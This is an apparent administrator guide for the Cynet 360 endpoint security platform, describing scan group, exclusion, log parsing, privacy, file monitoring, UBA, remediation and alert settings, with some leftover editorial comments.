This setting enables the Cynet EPS to employ fuzzy hashing techniques to detect malware. The technique involves mathematically calculating similarities between files. The detection method enables the system to detect previously-unknown variants of malware through similar or shared code.

ADT—Fuzzy Hashing Remediation

This setting enables the remediation capabilities of the Fuzzy Hashing Detection mechanism. It appears only when Fuzzy Hashing Detection is enabled. When malware is detected using this method, it is automatically stopped.

Disable String Collection

This setting disables memory string collection by the EPS for all hosts in this scan group.

Memory Protection Mode

This setting enables the EPS to run in the kernel level. While in memory protection mode, the EPS gains visibility into kernel level threats and enables an anti-tampering mechanism, which prevents the EPS process from being terminated on the host.

Raw Disk Writing Prevention

This setting enables the EPS to prevent raw disk writing, such as writing to the MBR. It is available only when Memory Protection Mode is enabled.

Raw Disk Writing Process Termination

This setting enables the EPS to automatically terminate a process that attempts to perform a raw disk write. It appears only when Raw Disk Writing Prevention is enabled.

Memory Injection Prevention

This setting enables the EPS to pre-emptively terminate a process performing a memory injection at the kernel level. It appears only when Memory Protection Mode is enabled.

Local Alert Messages

This setting enables the EPS to display an alert on the host when a threat is detected.

Fast Scan Detection

This setting enables the EPS to send scan data from hosts to the Cynet server immediately for analysis. In normal operation, the EPS sends this data in increments to reduce network traffic congestion.

Fast Scan Remediation

This setting enables the EPS to automatically terminate any process that is detected as a threat using the fast scan detection method.

Windows Patch Validation

This setting enables the Windows Patch Validation function, as part of the Vulnerability Management feature. It enables monitoring and alerts when missing operating system patches are identified.

Unauthorized Applications

This setting enables the unauthorized applications validation function as part of the Vulnerability Management feature. It enables monitoring and alerts when unauthorized applications are identified.

Application Patch Validation

This setting enables the Application Patch Validation function as part of the Vulnerability Management feature. It enables monitoring and alerts when installed applications do not comply with the minimum configured version.

Agents Validation

This setting enables the Agent’s Validation function as part of the Vulnerability Management feature. It enables monitoring and alerts when a key application is not installed or is not running.

Vulnerability Assessment (VA) Indicator Period

Sets the time interval (in minutes) to search for new Vulnerability Assessment indicators.

Threat Hunting

When enabled, this setting supports searching on client endpoints by: SHA256, MD5, File Name, and Full File path.

Antivirus

When enabled, this setting detects malicious files on file execution events.

Antivirus Engines

You can select which Antivirus Engine is active on the endpoint’s scanner.

Antivirus Options

You can set Antivirus remediation options and enable antivirus file creation tracking.

Windows Events Monitoring

Enables Windows Event Monitoring.

Encryption Token

This setting is used to create a random encryption token to encrypt the password used for the Scan Account in this group. This ensures that the encrypted password token is unknown and stored passwords cannot be decrypted.

To ensure all configuration changes are saved, click Save.

Configuring Scan Population Settings

There are three ways to add endpoints to a scan group:

Individually via the hostname or IP address

IP address ranges

Active Directory by Organizational Units (OUs) or SGs COMMENT: define SG

Using the Host name or IP Address

You can add new endpoints to the scan group population by entering either an individual hostname such as “host1344”, or an IP address, such as 192.168.220.101.

To add the endpoint:

Click Endpoints.

Enter the Host Name or IP address.

Click Add.

    1. Note
      1. When entering a hostname, ensure that the Cynet server can resolve the hostname to an IP address to connect and scan the host.

You can import a Host name from a file.

To open the Import Hosts window, click Import.

Select a file to upload.

Click Upload CSV File.

A confirmation message opens.

An example CSV file is shown below:

The list in the CSV file is imported to the Population List:

Note

When uploading the file make sure that the CSV file contains only the Hostname. Also, the whole list must be in one column with no empty spaces or Headings.

Using IP Ranges

You can add new endpoints to the scan group population by entering an IP address range or CIDR range. Cynet looks for all active hosts within the range and adds them to the list.

Examples of IP range formats are:

IP range with subnet suffix: 192.168.1.0/24

IP range: 192.168.1.0 – 192.168.1.255

To add the endpoints:

Click IP Ranges.

Enter the IP range.

Click Add.

Note

When you enter a valid IP Range or CIDR range, the number of addresses within that range is displayed.

The IP range is displayed in the Population List.

Using Active Directory

You can add new endpoints to the scan group population by entering the names of Active Directory OUs or SGs. Cynet polls the active directory domain specified in Group Information settings and looks for all computer objects in this OU or SG.

To add an OU:

Click Active Directory.

Select OU.

Enter the OU name.

Click Add.

Methods for specifying and including or excluding OUs:

OU TypeDescription
Add an entire AD OU Tree*
Add Specific OUServers
Exclude Specific OUWorkstations. Excluded OUs are highlighted in red.
Add nested OUWorkstations + Locations + Laptops

Notes

You do not need to enter Distinguished Names (DNs) for OUs. Cynet performs a query in the tree structure for any OU that matches the name you enter.

If multiple OUs contain the same name but reside in different branches of the tree structure, use the Nested OU option (+ symbol) to specify the branch OU to be polled.

To manually poll Active Directory for the current list of computer objects in the specified OUs, and to refresh the endpoints list, click Sync, then Validate AD Connection.

Note

The Active Directory sync process might take a few minutes, depending on the number of OUs specified and the number of hosts that exist in the OUs. After the sync has completed, a ‘Synced Successfully’ message displays.

To add an SG:

Click Active Directory.

Select SG.

Enter the SG name.

Click Add.

A screenshot of a cell phone Description automatically generated

Removing an Active Directory Listing

To remove a host, IP range, OU, or SG from the scan population, select the item and click Delete. Confirm the deletion.

Configuring Scan Schedule Settings

You can configure scan groups to be scanned according to a schedule. By default, all days and all times are enabled for scanning.

To disable scanning on a day of the week, clear that day’s checkbox.

To set time restrictions for scans, enter Start Time and End Time. Times are in 24-hour HH:MM format.

You can also configure a schedule for when scans must NOT be performed by clearing Scan Enabled.

To add a new scan schedule, configure the scan settings and click Add.

To disable the whole scan group:

Clear Scan enabled.

Click Update.

Cynet does not scan any hosts in this scan group.

Setting Scan Frequency (Throttle Settings)

You can use Scan Throttling settings to control the number of concurrent scans during scan cycles in order to scan environments more efficiently.

The following settings are available in the ADVANCED tab:

Max Concurrent Scanned Hosts

This is the maximum number of hosts the Cynet server can attempt to scan at any one time. This setting throttles the scanner and prevents flooding the network with scan attempts.

The default setting is 200 hosts.

Scanned Hosts Timeout

The timeout value for responses from the PsExec COMMENT: Define process when using the Remote Procedure Calls (RPC) distribution type.

The default setting is 80 seconds.

Concurrent Remediation Actions

Use this setting to specify the maximum number of remediation actions the server can attempt at any one time.

The default setting is 300 actions.

Excluding IP Addresses and Hosts from Scans

Individual IP addresses, IP address ranges, or Hostnames can be excluded from scanning, even if they are configured in a scan group.

To exclude them from being scanned:

In the CONFIGURATION tab, scroll down to EXCLUSION SETTINGS.

Enter an IP address or an IP address range into the text box.

Acceptable IP and IP Range formats are as follows:

ExampleFormat
Explicit IP address192.168.0.1
IP address range192.168.0.1-192.168.0.255
IP address with subnet prefix192.168.0.1/24
Hostnamejohnsmith-lp

To add the exclusion to the list, click Add.

Note

When a valid IP Range or CIDR COMMENT: Define range is entered, the number of addresses within that range is displayed.

To remove an IP address or IP address range from the exclusion list, select the item and click Delete.

Cynet confirms the deletion.

Excluding Analysis Policies from Scans

You can use Policy Exclusion Settings to exclude policies from running on specified hosts.

Note

Excluding policies from running on hosts might have an adverse effect on detection analysis. Policy exclusions must be discussed with a Cynet representative before any changes are made.

To exclude a policy from running on endpoints:

In the ADVANCED tab, scroll down to POLICY EXCLUSION SETTINGS.

Type a few characters of the Policy Title to exclude.

Cynet displays all matching Policy Titles.

Select the policy to exclude.

To select hosts to exclude, in the Wild Card field, enter a regular expression.

You can exclude multiple hosts from a policy by using regex.

Some examples are:

To exclude Hostname 123 from a policy, use Hostname123.

To exclude workstations that begin with the character W, use W*.

To add the host or wildcard exclusion for this policy, click Add.

When you have added the exclusion, a menu displays all exclusion entries. Entries display with the policy name and the host/regex match. These hosts are excluded from factoring this policy into its risk level during calculations.

To delete a policy exclusion, click Remove.

To edit a policy exclusion:

Click Edit.

You can now edit the wildcard field.

To apply the changes to the policy exclusion, click Save.

Excluding Domains from Scans

You can use Domain Whitelisting settings to filter out trusted domains from analysis.

To add a domain to the whitelist:

In the Advanced tab, scroll down to Domain Whitelisting Settings.

Enter the domain to be whitelisted.

Click Add Domain.

The domain is displayed in the list.

To edit an existing whitelisted domain entry:

Select the domain name.

Click Update.

To delete an existing whitelisted domain:

Select the domain name.

Click Remove.

Configuring Network Traffic Analysis Settings

You can configure Traffic Analysis settings (in Configuration) for the Network Interface Card (NIC) you want to use to analyze traffic from a SPAN port or a network tap port.

To configure Traffic Analysis settings:

In the Configuration tab, scroll down to Network Traffic Analysis Settings.

Select the NIC to be used for network traffic analysis.

Click Save Adapters.

Configuring Log Parser Settings

Log Parser Settings enables parsing and ingesting of log data from external sources such as a proxy server.

To configure a new set of logs to parse:

In the Configuration tab, scroll down to Log Parser Settings.

Click Create.

The Log Parser definition window displays.

In the Log Parser definition window, you can define how to parse proxy logs. The log entries consist of columns separated by one or more spaces.

Note

A column represents a field.

Optionally parsed fields are:

Source IP

The client IP address.

Destination IP

The Domain destination IP address.

User

The User identity for the requesting client.

Method

The method to obtain an object.

URL address

The requested URL.

Date

The time when the proxy server started to log the transaction. This happens at the end of a transaction lifecycle, after receiving the entire request and after sending the entire response to the HTTP client.

Host

The Hostname of the original requested URL.

Port

The Destination port.

Event Identifier

A unique number in each log that identifies it from all others.

Regex Separator

The character which separates fields of information in the log.

Fields Format Type

There are two types of field formats: By Name or By Offset. Parsing by name indicates parsing fields within the log according to the name of each field. Parsing by offset indicates parsing fields within the log according to each field’s column location.

Each log file has a different set of fields. Not all logs have the same fields. Each file provides its own parsing configuration.

Parser Modes of Operation

To extract a field from a log entry, the parser walks through a string formatted in the configuration table for the current log file and field. Each character in the formatted string indicates the next step the parser must take. The basic string format is an integer, indicating the location of the requested data in the column index. For example, the URL field string format could be “2” because the URL is in the third column of the log entry.

Formatting Rules

Columns are separated by one or more spaces unless they are in quotations.

The first column index is zero

For an undefined field use “100”

To add two columns, use index1 + index2

To remove a prefix: index – prefixSize

For example:

User = Bella. We want to parse only Bella (assuming the User is in second place).

Use string format = 1-5

For fields that are located differently in each row in the log and have a fixed prefix: ~ prefix.

For example: Every URL includes the prefix request=http://www.google.com

URL format string = ~ request= > the parser searches for the column index of current prefix in each line and extracts the data.

Remark: Must have a space between each index, +, -, ~ in string format!

For example: ~ request – 7 + 8.

Example:

In the example below, the proxy log is being parsed to match the correct fields:

When the parser is defined, click Save.

Note

The Proxy Parser name must include the word “proxy” with an integer following it for identification.

To test a defined parser for correct formatting:

Select the parser from the drop-down menu.

Enter your sample log string in the text box.

To begin parsing your log string, click Verify Parser.

Check that the field names match up to the correct fields within the log string.

To go back to fix defined parsers, click Edit.

To remove a defined parser, click Delete.

Parser Mode of Operation—Using Name Indication

In order to extract a field from a log entry, the parser walks through a string formatted in the configuration table for the current log file and field. Each character in the formatted string indicates the next step the parser must take. The basic string format uses key indicators, indicating the field name followed by the requested data. For example, the URL field http://www.gmail.com.

Example:

In the example below, the VPN log is being parsed to match the correct fields based on token names:

In the Log Parser definition window, enter a proxy parser name. Each field’s index displays in its corresponding field name.

Analytics Server Configurations

As part of the File Monitoring feature, Cynet uses an analytics server based on ELK COMMENT: Define. This configuration enables the connection between the Cynet server and the analytics server.

To configure the Analytics Server:

Select the Configure Analytics Server checkbox.

Complete the displayed fields.

Note

The File Monitoring feature does not work without the analytics server.

Monitoring Malicious Logins

Cynet 360 enables you to receive alerts whenever a malicious login is detected.

You can create fake credentials of a deception User, which you can then use to monitor failed logins. When a failed login to a deception User is detected, an alert is generated.
See section ‎0 for information about creating and managing deception Users.

IMPORTANT!

Adding credentials to a real host creates fake User credential files on the host acting as decoys.

Configuring Advanced Settings

This section describes advanced configuration settings.

Configuring Connection Settings

In this section, you can specify the Cynet primary and secondary server IP addresses, as well as a proxy IP address.

To configure Connection Settings:

Navigate to the Advanced tab.

Fill out the IP address fields as follows:

FieldDescription
Primary Cynet Server AddressSpecify the primary IP address and port of the Cynet server. This address is used by the EPS to send scan data.
Secondary Cynet Server AddressSpecify the secondary IP address and port of the Cynet server. This address is used when the primary server is unavailable. This is an Optional field.
Sever Proxy SettingsIf an Internet proxy is used, specify the proxy IP address and port for the Cynet server to synchronize with the Cynet Virtual Private Cloud (VPC).

Configuring Privacy & Compliance Settings

You can use Privacy & Compliance settings to limit the amount of information collected from endpoints. You can also anonymize information to be sent to the Cynet SOC.

You can enable the following settings:

SettingDescription
Send Scan Errors to SIEMSends scan errors via syslog to the IP address configured in SIEM settings.
Send Audit Records to SIEMEnables the Cynet server to send audit messages via syslog to a configured SIEM.
Unique File Analysis by SOCAllows the system (Cynet SOC) to automatically send unique files to the SSE sandbox for analysis.
Analyzed File RetentionSpecify the number of days to keep analyzed file samples within the Cynet quarantine. The default is 30 days.
Log File RetentionSpecify the number of days to keep the Cynet system log files. The default is 7 days.
External Data Privacy.Prevents actual Hostnames and Usernames from being sent to the Cynet Soc. Host or User IDs are sent instead.
Internal Data PrivacyRestricts sensitive, private data from being shown in the UI.

Disabling Collection of Data

These settings prevent the CynetEPS from collecting certain information when performing scans.

You can disable the following data:

DataDescription
ARP Table Data CollectionDisables the collection of ARP Table data by the EPS.
Certificate Data CollectionDisables the collection of Certificate data by the EPS.
DNS Cache Data CollectionDisables the collection of DNS Cache data by the EPS.
Hosts File Data CollectionDisables the collection of Hosts File data by the EPS.
Installed Software Data CollectionDisables the collection of Installed Software data by the EPS.
IP Settings Data CollectionDisables the collection of IP settings data by the EPS.
User Login Data CollectionDisables the collection of User login data by the EPS.
Microsoft Updates Data CollectionDisables the collection of Microsoft Updates data by the EPS.
Network Interface Data CollectionDisables the collection of Network Interface data by the EPS.
Network Share Data CollectionDisables the collection of Network Share data by the EPS.

Configuring Cynet SOC Settings

The following additional advanced settings enable Operators to configure how data is transferred to and from the Cynet SOC.

FieldDescription
Cynet SOC File AnalysisAutomatically sends files to the Cynet SOC for further analysis.
Automatic UpdatesEnables the Cynet server to download and install updates from the Cynet VPC.
Command Line SyncDisables the synchronization of command-line parameters sent by the EPS to the Cynet SOC. Cynet does not recommend that you disable this parameter.
File WhitelistingEnables whitelisting of known files by the Cynet SOC.
Memory String SyncEnables the synchronization of memory strings sent by the EPS to the Cynet SOC. Cynet does not recommend that you disable this parameter.

Note

Cynet recommends leaving these settings, especially the Anonymization and Disable … Collection settings, with their default values to perform complete threat analysis on hosts. Limiting collected data can negatively impact Cynet’s threat detection.

Configuring Slave Server Settings

You can use the Slave server settings to configure a Cynet server as a Slave server in a distributed architecture.

To configure a Cynet Server as a Slave Server, in the Master and Slave Server Settings section:

Enter the Slave Machine Name.

Enter the Cynet Client ID.

Enter the Slave IP address.

Click Add.

Configuring Console Settings

You can use the UI session Console setting to configure how long a session in the Cynet console lasts before automatically logging out a User.

The Inactivity Logout Timeout can range from 1 minute to 525,600 minutes, or one year. The default setting is 20 minutes.

Windows Events

You can collect Windows events and send the data to FileService on the Cynet server. The server stores these events in an Elasticsearch database.

You can use Cynet 360 to search the events by:

ID

Event type

Host name

Note

For more information, see the Cynet Zendesk article “Cynet 360 Release Notes- Version 3.4.9”.

Configuring Cynet 360 to Collect Windows Events

To configure Cynet 360 to collect Windows events:

          1. Enable the Windows events collection feature in Cynet 360:

On the main menu, click .

In the Scan Groups tab, scroll down to the Windows Events Monitoring section.

Select Enable Windows Events Monitoring.

Click Save.

Create a configuration to define which Windows events to monitor:

On the main menu, click .

In the Windows Events tab, click Create.

Create the new configuration and click Add.

View Windows events:

From the main menu, click .

On the top menu, click Hosts.

Select Windows Events.

Filter the results by:

Event ID

Event Type

Host Name

Source

Date Created

File Monitoring Settings

Cynet 360 enables you to monitor files more closely when:

Files are created

Files are renamed

Files are executed

These actions are saved in the Elasticsearch database, which can be easily queried for auditing purposes.

Note

File monitoring is only available for Windows, and only for Windows 7 and up.

Configuring File Monitoring

The following are the main steps to configure file monitoring in Cynet 360:

          1. Enable file monitoring in Cynet 360.

Set the extensions to be monitored.

Connect to the analytics server.

The following sections describe each of these steps in more detail.

Enabling File Monitoring

To enable file monitoring in Cynet 360:

          1. On the main menu, click .

In the Scan Groups tab, scroll down to the File Monitoring section.

Select Enable File Monitoring.

Click Save.

Setting File Monitoring Extensions

To specify the file extensions that you want to monitor for changes.

          1. On the main menu, click .

In the Advanced tab, scroll down to the File Monitoring section.

Enter a file extension and click +.

Repeat this step for as many file extensions as you like.

Enter the time interval in minutes in which file monitor reports will be sent to the server.

Click Save.

Connecting to the Analytics Server

The analytics server is the Elasticsearch database which Cynet uses to store File Monitoring events.

To configure the analytics server:

          1. On the main menu, click .

In the Configuration tab, select Configure Analytics Server.

Enter the connectivity settings for the analytics server.

To test the settings, click Test Connectivity.

Click Save.

Analysis

The Analysis page contains configuration settings for Cynet’s Smart Simulation Execution (SSE) sandbox. The SSE sandbox enables dynamic file analysis.

Dynamic Analysis Settings

The Cynet SSE dynamic analysis can be configured for either a local sandbox or a cloud-based sandbox. To enable the cloud-based sandbox:

Select Enable SSE Sandbox Analysis.

Select Enable Cloud Sandbox.

Click Save.

To enable a local Sandbox:

Select Enable SSE Sandbox Analysis.

Select Enable Local Sandbox.

Enter the Local Sandbox IP address.

Click Save.

Deep Scan Settings

You can configure the time intervals for the Deep Scan process. There are two available settings:

Deep Scan Update Interval

You can use this setting to configure how often the Cynet Deep Scanner (CynetDS.exe) sends data back to the Cynet server for analysis.

The minimum value is two minutes, and the default value is fifteen minutes.

Deep Scan Time Limit

You can use this setting to configure the time that the CynetDS runs on the endpoint to collect deep scan data. At the end of this time period, the CynetDS terminates.

  1. The minimum value is fifteen minutes, and the default value is three hundred minutes.

After configuring the settings, click Save.

Alert Process Tree

Cynet 360 includes a new process tree visualization. If an alert is triggered on a file, you can see which processes were run, up to five levels down. This enables you to better understand which processes took place in an attack, what went wrong, and who was involved.

Example

Cynet 360 detected suspicious activity regarding an Excel file. When you look at the Alert Process Tree visualization, it becomes clear that the issue is the macro file, not the Excel file.

Viewing the Alert Process Tree

To view the Alert Process Tree for an alert:

          1. From the main menu, click .

Locate the alert you want to investigate by:

Scrolling to the alert

Performing a search for the alert

Filtering the list of alerts by alert type

On the alert you want to investigate, click .

A detailed description of the alert is displayed and the Process Tree shows up to five levels of processes that were run, which triggered the alert.

The Process Tree shows the name of the processes, the order in which they were run, and the User(s) who ran the processes.

Configuring Vulnerability Management Settings

In the Vulnerability Management page, you can configure the following functions:

Windows Patch Validation

Unauthorized Applications

Application Patch Validation

Agents Validation

UBA Management

Configuring Windows Patch Validation:

The Cynet scanner queries the Windows Update subsystem at the endpoint and maps all the available Knowledge Bases (KBs) that are ready to be installed. When the EPS detects that there are KBs that have not been installed, it generates a medium level alert that includes the list of KBs that are not installed yet.

Operators can whitelist Windows KB updates, which are known to be missing or uninstalled. They can ensure that these updates do not generate an alert.

To add Windows KBs to the whitelist, type the name of the KB. Each KB displays on a new line.

Unauthorized Applications

The Cynet scanner queries the Windows Add/Remove programs subsystem at the endpoint. It compares the list received to the list of applications that are unauthorized to run on the endpoint. When the EPS detects that there are unauthorized applications installed at the endpoint, it generates a medium severity alert that includes the list of unauthorized applications installed at the endpoint.

Operators can add or remove applications from the unauthorized applications list. The list includes applications that Cynet’s R&D has classified as “Potentially” restricted.

To add an application to the unauthorized applications list, add the name of the application on a new line.

Note

Enter the name of the application exactly as it is displayed in “Add/Remove Programs” in Windows.

Application Patch Validation

The Cynet scanner queries the Windows Add/Remove programs subsystem at the endpoint and verifies that the latest patched version of the application is installed.

For example, if the organization’s security team defines that an Internet Explorer version below 11 is considered vulnerable, Cynet scans all the endpoints in the organization and generates a medium severity alert of all the endpoints containing an Internet Explorer version below version 11.

Operators can add or remove applications that must be installed with a minimum version.

Note

Enter the name of the application exactly as it is displayed in “Add/Remove Programs” in Windows.

Agents Validation

Operators can insert a list of third-party applications and processes, which are defined as crucial applications at the endpoint. The Cynet scanner queries the Windows task manager and Add/Remove programs to verify the following:

Is a third-party application installed?

Is a third-party application running?

Cynet scans all the endpoints in the organization and generates a medium severity alert which contains the list of endpoints that are not compliant:

Application is installed but not running

Application is not installed and not running

Operators can add or remove applications from the important third-party applications list.

When adding applications to the list:

Enter the name of the application as it is displayed in Windows “Add/Remove Programs”

Enter the process of the application as it displays in Windows Task Manager

Configuring UBA Management

Cynet 360 performs User and Entity Behavioral Analysis (UEBA) by collecting and analyzing User behavioral data. When unusual logins occur, Cynet can alert Users through the SMS Confirmation feature and request the User to confirm or decline the login. If the User declines the login, Cynet 360 generates an alert for unusual User behavior.
Cynet SMS verification messages are always sent from the phone number +1 (646) 846-8440 and are similar to the following examples:

The hyperlink within the message points to Cynet’s User verification site.

Configuring Users for UBA

To activate UBA, you must first configure a User with a mobile number. There are two methods to configure Users:

Selecting from Active Directory

Importing a CSV file

To configure the User from Active Directory:

From the Settings page, click the Configuration tab.

Scroll down to Import Users Data Settings.

Select the User.

In the drop-down menu, select Mobile.

In the Mobile field, check that a phone number is available or enter the User’s phone number.

Click Save.

To configure the User from a CSV file:

From the Settings page, click the Configuration tab.

Scroll down to Import Users data from CSV File.

In the User Name field, enter the first column in the CSV file you want to import. For example, to select the first column, enter 0.

In the drop-down menu, select Mobile.

In the Mobile field, enter the second column in the CSV file you want to import. For example, to select the second column, enter 1.

To select and upload the file, click Choose File, then click Upload CSV file.

To send an SMS alert to the User when suspected activity is detected, select the Enable SMS Confirmations checkbox.

Only when the User confirms in the SMS message that the activity is malicious is an alert opened in the system.

Managing UBA Policies

Set UBA policies to trigger events. At setup, the UBA Management tab contains the UBA Management pre-configured event triggers.

To manage UBA event triggers, click the UBA Management tab.

Configuring UBA Event Triggers

The UBA Management page enables you to:

Edit or update an existing UBA event trigger

Create a new UBA event trigger

To configure an existing UBA event trigger:

In the relevant event trigger field, click Edit.

From the Update Event window, you can modify pre-defined settings:

Name

Description

Query String

Keys

Question

Notification

Severity level

Time Interval in Minutes

Click Update.

To activate the event trigger, click Enable.

To create a new UBA event trigger:

CAUTION!

Event triggers are based on SQL queries. It is recommended that only advanced Users configure event triggers.

Click Create.

Populate the fields:

Enter the SQL query string for the event trigger

The Keys field is populated from the data entered in the Query String field. Clear the checkboxes of keys that must not be included in the notification message sent to the User

In the Question field, enter the question that the User will see in the SMS

To send a notification by SMS, select the SMS checkbox

Set the severity level of the event trigger

Set the time interval of the UBA event cycle

Click Save.

Customizing Auto-Remediation Actions

This section describes the range of remediation actions the User can take.

Configuring Remediation Settings

In the Advanced page you can use Remediation settings to configure auto-remediation to retry remediation actions if they initially fail.

Remediation Retry Attempts

You can set the maximum number of times the system attempts a remediation action. The default is 48 retries.

Remediation Retry Interval

You can set the time interval between remediation retries in minutes. The default is 30 minutes.

Custom Remediation Playbooks

The Custom Remediation Playbook feature enables the User to enhance the Cynet360 Remediation capabilities even further, by storing a collection of Custom Remediation Actions and running them sequentially or in parallel.

It is possible to use Playbooks as part of the Remediation actions as well as Auto-Remediation actions.

Each of these actions can run on the Cynet Server or on an EPS Endpoint, and can originate from a file, host, or User.

Configuring the Custom Remediation Playbook

Note

Before creating a Playbook, you must first create at least one Custom Remediation action.

To configure the Custom Remediation Playbook:

          1. On the main menu, click .

From the Remediation tab click PLAYBOOKS.

To add a new Playbook, click Create.

Applying the Custom Remediation Playbook

To apply the Custom Remediation Playbook to a File or User:

          1. From the main menu, click .

Select an entity from the list.

Click Actions.

Choose whether to use the Custom Remediation as part of a Remediation or Auto-Remediation.

Running custom Remediation as part of Remediation actions:

On the Remediation top menu, click the Playbook action.

Running custom Remediation as part of Auto-Remediation actions: On the top menu, choose Auto Remediation in the Auto-Remediation pane, and associate the Playbook action with the Auto-Remediation Alert action.

Viewing System Information

The System Info page provides general information about the system, as well as information regarding the health of the system.

Main Info

The Main Info section contains information about the Cynet installation.

Cynet Version

The current version of Cynet 360.

Cynet Installation Directory

The path of the Cynet system installation.

Disk Space

The amount of used disk space in MB compared to the total amount of available disk space in MB.

All system drives display, although Cynet monitors the disk on which it is installed for low disk space.

System Health

The System Health section contains information regarding the following services:

ServiceDescription (good health status is indicated with a )
Cynet ServiceDisplays the health status of the main Cynet service.
DB – CynetDB ServiceDisplays the health status of the Cynet database service.
Sync CloudDisplays the health status of the connection to the Cynet VPC cloud.
Monitor – CSHelper ServiceDisplays the health status of the Cynet Helper service, which monitors the Cynet service and the CynetDB service.
Local Smart Simulation ExecutionDisplays the health status of the connection to the Cynet SSE sandbox. Shows the status for local and cloud sandbox connections.
Last Antivirus UpdateDisplays the date and the time of the last Antivirus update.

Configuring Alerts

On the Alerts page, you can configure settings for the following:

Email Settings

To configure the Email Settings, from the Settings page, select the Alerts tab and scroll down to the Email Settings section.

You can configure the following settings for email alerts:

SettingDescription
Email Alert RecipientsThe email addresses that receive email alerts when the system generates an alert. Multiple emails are comma-separated.
SMTP ServerThe IP address of the organization’s SMTP server, which is used to transport alert emails when generated by the system.
SMTP SSLEnable if the SMTP server requires an SSL connection to be established for sending mail.
Email Alert SenderControls the “From” field in email alerts generated by the system.

Note

If the SIEM Connectivity settings are changed to a port other than the default (port 514), the Cynet services must be restarted on the server for the changes to be applied.

General Settings

You can specify the SIEM server to which the Cynet server sends syslog messages. To define a SIEM server, enter an IP address and a port number.

The default port setting is 514.

Configuring Alert Settings

You can configure Alert Settings for the types of alerts to be enabled. Operators can exclude or filter out certain types of alerts.

Note

Cynet recommends that all alert types are enabled to ensure that all types of threats are detected causing alerts to generate.

To configure the Alert Settings, from the Settings page, select the Alerts tab and scroll down to the Alert Settings section.

You can enable the following Alert Settings:

SettingDescription
Port Scanning AlertsEnables alerts to be generated for port scanning detection. Detections are only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
Ransomware AlertsEnables alerts to be generated for ransomware detection.
ARP Poisoning AlertsEnables alerts to be generated for ARP poisoning detection.
Pass-the-Hash AlertsEnables alerts to be generated for pass-the-hash detection.
Critical Pass-the-Hash AlertsEnables alerts to be generated for critical pass-the-hash detection.
Show Mimikatz AlertsEnables alerts to be generated for Mimikatz detection.
Powershell Empire AlertsEnables alerts to be generated for Powershell Empire detection.
VSSAdmin AlertsEnables alerts to be generated for VSSAdmin detection.
DNS Tunneling AlertsEnables alerts to be generated for DNS tunneling detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
ICMP Tunneling AlertsEnables alerts to be generated for ICMP tunneling detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
SMB Scanning AlertsEnables alerts to be generated for SMB scanning detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
Brute Force AlertsEnables alerts to be generated for brute force attempt detection.
Hacking Tool AlertsEnables alerts to be generated for hacking tool detection. Detection only possible if “Credential Decoy Detection” is enabled in “Scan Groups” settings.
Remote Access Tool AlertsEnables alerts to be generated for remote access tool detection.
Trojan AlertsEnables alerts to be generated for trojan detection.
HTTP Tunneling AlertsEnables alerts to be generated for HTTP tunneling detection. Detection is only possible if “Network Attacks Detection” is enabled in “Scan Groups” settings.

Unscanned Host Alert Settings

You can use these setting to generate alerts for specific hosts that are not being scanned by Cynet.

To add a host to the list:

Enter a few letters of a Hostname.

When the Hostname you want appears in the drop-down menu, select it from the menu.

Click Add.

To remove a host, select the host from the list and click Delete.

Email Alert Filter Settings

You can use the Email Alert Filter settings to configure the severity of email alerts sent out by email. By default, Cynet 360 sends all alert severity levels.

To configure the Email Alert Filter Settings:

From the Settings page, select the Alerts tab and navigate to the Email Alert Filter Settings section.

From the scroll down menu, select the required level:

Informative: Sends all severity levels of alerts to email recipients

Low: Sends only Low, Medium, High, and Critical severity alerts to email recipients

Medium: Sends only Medium, High, and Critical severity alerts to email recipients

High: Sends High, and Critical severity alerts to email recipients

Critical: Sends only Critical severity alerts to email recipients

Click Save.

File Monitoring

Cynet solution includes file monitoring capabilities expanding the file based forensic visibility from mainly executables to full file-based activities on the protected asset.

The monitoring capabilities provide visibility to the following actions

• File Access

• File Deleted

• File Renamed

• File Executed

• File Created

Enabling the file monitoring feature requires several steps to be enabled:

  1. Configure Cynet analytic server (Shared with additional advance Cynet features)

  1. In the scan group setting page you must enable file monitoring

  1. Configuring which files types to collect from the endpoints:

Under setting Advance tab under the file monitoring section you must configure the file extensions Cynet monitors the disk.

Due to the nature of file monitoring it is ill-advised to monitor all the extensions by default since this creates a heavy burden on the Cynet EPS and might impact the end-customer machine performance.

Best practice recommendations are available (refer to the dedicated file monitoring installation guide).

Once configured, the data collected is displayed in the Forensic tab inside the file monitoring dashboard in the Files pillar.

The dashboard offers filters at the top of the screen to sort through action types and several key parameters such as Username or ProcessSHA256.

If you want to query deeper into the collected data, you can use the free text search option and it submits queries against the raw data of the events.

Expanding a single file event using the + presents all the data collected parsed and indexed based on key pair values.

Windows Events

Cynet enables log collection from Windows-based hosts using the Cynet EPS Agent deployed on the protected asset. The collection is empty by default and requires a number of steps to be enabled.

  1. Configure Cynet analytic server (Share with additional Cynet functions such as file monitoring—see Appendix A step 1)
  2. In the Scan Group Settings page, enable Windows Event Monitoring

  1. Configuring which event types to collect from the endpoints:

Under settings Windows Events section you can find the overview page displaying the current configured events to be collected. By current defaults it starts empty.

In the overview below you can see events 4103 collected from two scan groups and event 4104 collected from a single group.

You can create additional collection policies using the create button specifying the log type and ID using the upper section , or collecting custom fields for more advance logs using the lower section.

Once the data is collected, you can drill into the collected Windows events inside the forensic dashboard under the hosts pillar Windows Events section:

The main Windows event dashboard is unfiltered and enables you to go over all the events collected in the environment. You can use the top section to filter based on various key values

Hosts , Event ID , specific Event Types

If you want to query deeper into the collected data you can use the free text search option and it cab query against the raw data of the events.

Expanding a single event using the + presents all of the data collected parsed and indexed, based on key pair values.

Multi-Tenant Architecture

General Overview

Cynet offers a multi-tenant architecture built to fit the requirements of MSSP COMMENT: Define and Large Enterprise customers.

The Multi-Tenant architecture is delivered using multiple servers hosting Cynet application and database services. There are several architectures involving multi-tenant servers. Some of them are built on top of a simple single server, which is a single-site approach, while others are built with components designed for scale leveraging. COMMENT: This is unclear…Dockers and additional Cynet components

In both cases, each server instance is named as a “site” and is managed by a server acting as the Global manager server.

This multi-tenant approach enables the Global Manager to provide a single surface for all activities related to operating multiple sites.

Once the Global Manager server is configured and connected to the all of the sites, a new set of capabilities appears in the UI. These enable navigation between the various sites based on the User privileges and the ability to view and take actions on the entire environment, such as specifying a central security policy or creating a new site

Site Navigation

